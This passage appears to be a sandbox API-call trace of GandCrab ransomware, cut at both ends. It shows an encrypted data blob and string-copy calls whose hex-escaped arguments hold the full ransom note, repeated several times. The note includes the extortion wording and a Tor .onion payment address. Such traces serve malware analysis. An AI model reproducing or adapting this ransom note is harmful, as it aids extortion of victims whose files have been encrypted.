DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r\r\n---END PC DATA---") returned 2930 [0067.324] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x7b\x56\x7d\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x7b\x45\x58\x54\x45\x4e\x53\x49\x4f\x4e\x7d\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x7b\x55\x53\x45\x52\x49\x44\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a") returned 1343 [0067.324] VirtualAlloc (lpAddress=0x0, dwSize=0x216c, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000 [0067.324] lstrcpyW (in: lpString1=0x2300000, lpString2="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x7b\x56\x7d\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x7b\x45\x58\x54\x45\x4e\x53\x49\x4f\x4e\x7d\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x7b\x55\x53\x45\x52\x49\x44\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a" | out: lpString1="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x7b\x56\x7d\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x7b\x45\x58\x54\x45\x4e\x53\x49\x4f\x4e\x7d\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x7b\x55\x53\x45\x52\x49\x44\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a") returned="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x7b\x56\x7d\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2